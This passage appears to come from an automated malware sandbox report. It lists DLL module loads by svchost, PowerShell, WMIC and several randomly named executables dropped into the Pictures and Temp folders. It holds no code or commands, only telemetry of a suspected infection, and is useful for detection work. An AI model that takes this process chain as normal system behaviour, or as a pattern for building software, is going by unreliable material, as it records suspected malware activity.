                        Source: C:\Windows\System32\svchost.exeSection loaded: winsta.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: fhcfg.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: wevtapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: efsutil.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: netapi32.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ncasvc.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: httpprxp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: wpdbusenum.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: portabledeviceapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: devobj.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: portabledeviceconnectapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: wtsapi32.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: winsta.dll
                        Source: C:\Users\user\Pictures\i7gUU3MlvTwbsK8r3hAjzW0p.exeSection loaded: apphelp.dll
                        Source: C:\Users\user\Pictures\i7gUU3MlvTwbsK8r3hAjzW0p.exeSection loaded: acgenral.dll
                        Source: C:\Users\user\Pictures\i7gUU3MlvTwbsK8r3hAjzW0p.exeSection loaded: uxtheme.dll
                        Source: C:\Users\user\Pictures\i7gUU3MlvTwbsK8r3hAjzW0p.exeSection loaded: winmm.dll
                        Source: C:\Users\user\Pictures\i7gUU3MlvTwbsK8r3hAjzW0p.exeSection loaded: samcli.dll
                        Source: C:\Users\user\Pictures\i7gUU3MlvTwbsK8r3hAjzW0p.exeSection loaded: msacm32.dll
                        Source: C:\Users\user\Pictures\i7gUU3MlvTwbsK8r3hAjzW0p.exeSection loaded: version.dll
                        Source: C:\Users\user\Pictures\i7gUU3MlvTwbsK8r3hAjzW0p.exeSection loaded: userenv.dll
                        Source: C:\Users\user\Pictures\i7gUU3MlvTwbsK8r3hAjzW0p.exeSection loaded: dwmapi.dll
                        Source: C:\Users\user\Pictures\i7gUU3MlvTwbsK8r3hAjzW0p.exeSection loaded: urlmon.dll
                        Source: C:\Users\user\Pictures\i7gUU3MlvTwbsK8r3hAjzW0p.exeSection loaded: mpr.dll
                        Source: C:\Users\user\Pictures\i7gUU3MlvTwbsK8r3hAjzW0p.exeSection loaded: sspicli.dll
                        Source: C:\Users\user\Pictures\i7gUU3MlvTwbsK8r3hAjzW0p.exeSection loaded: winmmbase.dll
                        Source: C:\Users\user\Pictures\i7gUU3MlvTwbsK8r3hAjzW0p.exeSection loaded: winmmbase.dll
                        Source: C:\Users\user\Pictures\i7gUU3MlvTwbsK8r3hAjzW0p.exeSection loaded: iertutil.dll
                        Source: C:\Users\user\Pictures\i7gUU3MlvTwbsK8r3hAjzW0p.exeSection loaded: srvcli.dll
                        Source: C:\Users\user\Pictures\i7gUU3MlvTwbsK8r3hAjzW0p.exeSection loaded: netutils.dll
                        Source: C:\Users\user\Pictures\i7gUU3MlvTwbsK8r3hAjzW0p.exeSection loaded: aclayers.dll
                        Source: C:\Users\user\Pictures\i7gUU3MlvTwbsK8r3hAjzW0p.exeSection loaded: sfc.dll
                        Source: C:\Users\user\Pictures\i7gUU3MlvTwbsK8r3hAjzW0p.exeSection loaded: sfc_os.dll
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeSection loaded: apphelp.dll
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeSection loaded: winhttp.dll
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeSection loaded: msimg32.dll
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeSection loaded: msvcr100.dll
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeSection loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeSection loaded: wininet.dll
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeSection loaded: rstrtmgr.dll
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeSection loaded: ncrypt.dll
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeSection loaded: ntasn1.dll
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeSection loaded: iertutil.dll
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeSection loaded: windows.storage.dll
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeSection loaded: wldp.dll
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeSection loaded: profapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeSection loaded: mswsock.dll
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeSection loaded: iphlpapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeSection loaded: winnsi.dll
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeSection loaded: urlmon.dll
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeSection loaded: srvcli.dll
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeSection loaded: netutils.dll
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeSection loaded: dpapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeSection loaded: cryptbase.dll
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeSection loaded: ntmarta.dll
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeSection loaded: mozglue.dll
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeSection loaded: wsock32.dll
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeSection loaded: vcruntime140.dll
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeSection loaded: msvcp140.dll
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeSection loaded: vcruntime140.dll
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeSection loaded: uxtheme.dll
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeSection loaded: propsys.dll
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeSection loaded: linkinfo.dll
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeSection loaded: windowscodecs.dll
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeSection loaded: apphelp.dll
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeSection loaded: winhttp.dll
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeSection loaded: msimg32.dll
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeSection loaded: msvcr100.dll
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeSection loaded: mswsock.dll
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeSection loaded: napinsp.dll
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeSection loaded: pnrpnsp.dll
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeSection loaded: wshbth.dll
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeSection loaded: nlaapi.dll
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeSection loaded: iphlpapi.dll
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeSection loaded: dnsapi.dll
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeSection loaded: winrnr.dll
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeSection loaded: fwpuclnt.dll
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeSection loaded: rasadhlp.dll
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeSection loaded: napinsp.dll
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeSection loaded: pnrpnsp.dll
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeSection loaded: wshbth.dll
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeSection loaded: nlaapi.dll
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeSection loaded: winrnr.dll
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeSection loaded: fwpuclnt.dll
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeSection loaded: napinsp.dll
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeSection loaded: pnrpnsp.dll
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeSection loaded: wshbth.dll
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeSection loaded: nlaapi.dll
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeSection loaded: winrnr.dll
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeSection loaded: fwpuclnt.dll
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeSection loaded: windows.storage.dll
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeSection loaded: wldp.dll
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeSection loaded: uxtheme.dll
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeSection loaded: propsys.dll
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeSection loaded: profapi.dll
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeSection loaded: windows.staterepositoryps.dll
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeSection loaded: edputil.dll
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeSection loaded: urlmon.dll
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeSection loaded: iertutil.dll
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeSection loaded: srvcli.dll
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeSection loaded: netutils.dll
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeSection loaded: sspicli.dll
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeSection loaded: wintypes.dll
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeSection loaded: appresolver.dll
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeSection loaded: bcp47langs.dll
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeSection loaded: slc.dll
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeSection loaded: userenv.dll
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeSection loaded: sppc.dll
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeSection loaded: onecorecommonproxystub.dll
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeSection loaded: onecoreuapcommonproxystub.dll
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeSection loaded: pcacli.dll
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeSection loaded: mpr.dll
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeSection loaded: sfc_os.dll
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeSection loaded: napinsp.dll
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeSection loaded: pnrpnsp.dll
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeSection loaded: wshbth.dll
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeSection loaded: nlaapi.dll
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeSection loaded: winrnr.dll
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeSection loaded: fwpuclnt.dll
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeSection loaded: napinsp.dll
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeSection loaded: pnrpnsp.dll
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeSection loaded: wshbth.dll
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeSection loaded: nlaapi.dll
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeSection loaded: winrnr.dll
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeSection loaded: fwpuclnt.dll
                        Source: C:\Users\user\AppData\Local\Temp\7zS1198.tmp\Install.exeSection loaded: apphelp.dll
                        Source: C:\Users\user\AppData\Local\Temp\7zS1198.tmp\Install.exeSection loaded: acgenral.dll
                        Source: C:\Users\user\AppData\Local\Temp\7zS1198.tmp\Install.exeSection loaded: uxtheme.dll
                        Source: C:\Users\user\AppData\Local\Temp\7zS1198.tmp\Install.exeSection loaded: winmm.dll
                        Source: C:\Users\user\AppData\Local\Temp\7zS1198.tmp\Install.exeSection loaded: samcli.dll
                        Source: C:\Users\user\AppData\Local\Temp\7zS1198.tmp\Install.exeSection loaded: msacm32.dll
                        Source: C:\Users\user\AppData\Local\Temp\7zS1198.tmp\Install.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Local\Temp\7zS1198.tmp\Install.exeSection loaded: userenv.dll
                        Source: C:\Users\user\AppData\Local\Temp\7zS1198.tmp\Install.exeSection loaded: dwmapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\7zS1198.tmp\Install.exeSection loaded: urlmon.dll
                        Source: C:\Users\user\AppData\Local\Temp\7zS1198.tmp\Install.exeSection loaded: mpr.dll
                        Source: C:\Users\user\AppData\Local\Temp\7zS1198.tmp\Install.exeSection loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Local\Temp\7zS1198.tmp\Install.exeSection loaded: winmmbase.dll
                        Source: C:\Users\user\AppData\Local\Temp\7zS1198.tmp\Install.exeSection loaded: winmmbase.dll
                        Source: C:\Users\user\AppData\Local\Temp\7zS1198.tmp\Install.exeSection loaded: iertutil.dll
                        Source: C:\Users\user\AppData\Local\Temp\7zS1198.tmp\Install.exeSection loaded: srvcli.dll
                        Source: C:\Users\user\AppData\Local\Temp\7zS1198.tmp\Install.exeSection loaded: netutils.dll
                        Source: C:\Users\user\AppData\Local\Temp\7zS1198.tmp\Install.exeSection loaded: aclayers.dll
                        Source: C:\Users\user\AppData\Local\Temp\7zS1198.tmp\Install.exeSection loaded: sfc.dll
                        Source: C:\Users\user\AppData\Local\Temp\7zS1198.tmp\Install.exeSection loaded: sfc_os.dll
                        Source: C:\Users\user\AppData\Local\Temp\7zS1198.tmp\Install.exeSection loaded: drprov.dll
                        Source: C:\Users\user\AppData\Local\Temp\7zS1198.tmp\Install.exeSection loaded: winsta.dll
                        Source: C:\Users\user\AppData\Local\Temp\7zS1198.tmp\Install.exeSection loaded: ntlanman.dll
                        Source: C:\Users\user\AppData\Local\Temp\7zS1198.tmp\Install.exeSection loaded: davclnt.dll
                        Source: C:\Users\user\AppData\Local\Temp\7zS1198.tmp\Install.exeSection loaded: davhlpr.dll
                        Source: C:\Users\user\AppData\Local\Temp\7zS1198.tmp\Install.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Local\Temp\7zS1198.tmp\Install.exeSection loaded: wbemcomn.dll
                        Source: C:\Users\user\AppData\Local\Temp\7zS1198.tmp\Install.exeSection loaded: amsi.dll
                        Source: C:\Users\user\AppData\Local\Temp\7zS1198.tmp\Install.exeSection loaded: profapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\7zS1198.tmp\Install.exeSection loaded: windows.storage.dll
                        Source: C:\Users\user\AppData\Local\Temp\7zS1198.tmp\Install.exeSection loaded: wldp.dll
                        Source: C:\Users\user\AppData\Local\Temp\7zS1198.tmp\Install.exeSection loaded: propsys.dll
                        Source: C:\Users\user\AppData\Local\Temp\7zS1198.tmp\Install.exeSection loaded: windows.staterepositoryps.dll
                        Source: C:\Users\user\AppData\Local\Temp\7zS1198.tmp\Install.exeSection loaded: edputil.dll
                        Source: C:\Users\user\AppData\Local\Temp\7zS1198.tmp\Install.exeSection loaded: wintypes.dll
                        Source: C:\Users\user\AppData\Local\Temp\7zS1198.tmp\Install.exeSection loaded: appresolver.dll
                        Source: C:\Users\user\AppData\Local\Temp\7zS1198.tmp\Install.exeSection loaded: bcp47langs.dll
                        Source: C:\Users\user\AppData\Local\Temp\7zS1198.tmp\Install.exeSection loaded: slc.dll
                        Source: C:\Users\user\AppData\Local\Temp\7zS1198.tmp\Install.exeSection loaded: sppc.dll
                        Source: C:\Users\user\AppData\Local\Temp\7zS1198.tmp\Install.exeSection loaded: onecorecommonproxystub.dll
                        Source: C:\Users\user\AppData\Local\Temp\7zS1198.tmp\Install.exeSection loaded: onecoreuapcommonproxystub.dll
                        Source: C:\Users\user\AppData\Local\Temp\7zS1198.tmp\Install.exeSection loaded: pcacli.dll
                        Source: C:\Users\user\AppData\Local\Temp\7zS1198.tmp\Install.exeSection loaded: ntmarta.dll
                        Source: C:\Windows\SysWOW64\forfiles.exeSection loaded: apphelp.dll
                        Source: C:\Windows\SysWOW64\forfiles.exeSection loaded: version.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: framedynos.dll
                        Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: sspicli.dll
                        Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: msxml6.dll
                        Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: urlmon.dll
                        Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: iertutil.dll
                        Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: srvcli.dll
                        Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: netutils.dll
                        Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: vcruntime140.dll
                        Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: amsi.dll
                        Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: userenv.dll
                        Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: profapi.dll
                        Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: version.dll
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeSection loaded: apphelp.dll
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeSection loaded: winhttp.dll
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeSection loaded: msimg32.dll
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeSection loaded: msvcr100.dll
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeSection loaded: mswsock.dll
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeSection loaded: napinsp.dll
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeSection loaded: pnrpnsp.dll
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeSection loaded: wshbth.dll
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeSection loaded: nlaapi.dll
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeSection loaded: iphlpapi.dll
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeSection loaded: dnsapi.dll
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeSection loaded: winrnr.dll
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeSection loaded: fwpuclnt.dll
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeSection loaded: rasadhlp.dll
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeSection loaded: napinsp.dll
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeSection loaded: pnrpnsp.dll
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeSection loaded: wshbth.dll
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeSection loaded: nlaapi.dll
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeSection loaded: winrnr.dll
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeSection loaded: fwpuclnt.dll
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeSection loaded: napinsp.dll
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeSection loaded: pnrpnsp.dll
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeSection loaded: wshbth.dll
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeSection loaded: nlaapi.dll
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeSection loaded: winrnr.dll
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeSection loaded: fwpuclnt.dll
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeSection loaded: windows.storage.dll
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeSection loaded: wldp.dll
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeSection loaded: uxtheme.dll
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeSection loaded: propsys.dll
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeSection loaded: profapi.dll
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeSection loaded: windows.staterepositoryps.dll
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeSection loaded: edputil.dll
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeSection loaded: urlmon.dll
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeSection loaded: iertutil.dll
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeSection loaded: srvcli.dll
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeSection loaded: netutils.dll
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeSection loaded: sspicli.dll
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeSection loaded: wintypes.dll
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeSection loaded: appresolver.dll
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeSection loaded: bcp47langs.dll
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeSection loaded: slc.dll
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeSection loaded: userenv.dll
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeSection loaded: sppc.dll
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeSection loaded: onecorecommonproxystub.dll
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeSection loaded: onecoreuapcommonproxystub.dll
